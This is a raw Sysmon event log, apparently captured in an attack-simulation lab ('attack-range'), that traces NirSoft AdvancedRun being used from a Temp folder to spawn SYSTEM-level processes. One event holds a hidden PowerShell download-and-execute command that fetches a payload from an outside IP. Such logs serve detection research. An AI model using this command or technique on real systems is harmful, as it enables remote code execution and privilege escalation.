734700x80000000000000004079647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.119{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.118{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.116{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079640Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.115{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079639Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.114{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079638Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.112{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079637Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.109{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079636Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079635Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.108{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.107{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.106{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.106{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.105{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator
10341000x80000000000000004079629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.103{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004079628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.102{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator
154100x80000000000000004079627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.099{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg -runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator
534500x80000000000000004078672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.950{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator
154100x80000000000000004078665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.937{834264DD-14C8-61EB-9708-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoExit powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://34.218.235.219:80/b'))"C:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator
10341000x80000000000000004078664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.936{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004078663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.936{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14C8-61EB-9608-000000002702}4784C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004078662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.934{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.932{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5B08-000000002702}5868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.932{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KE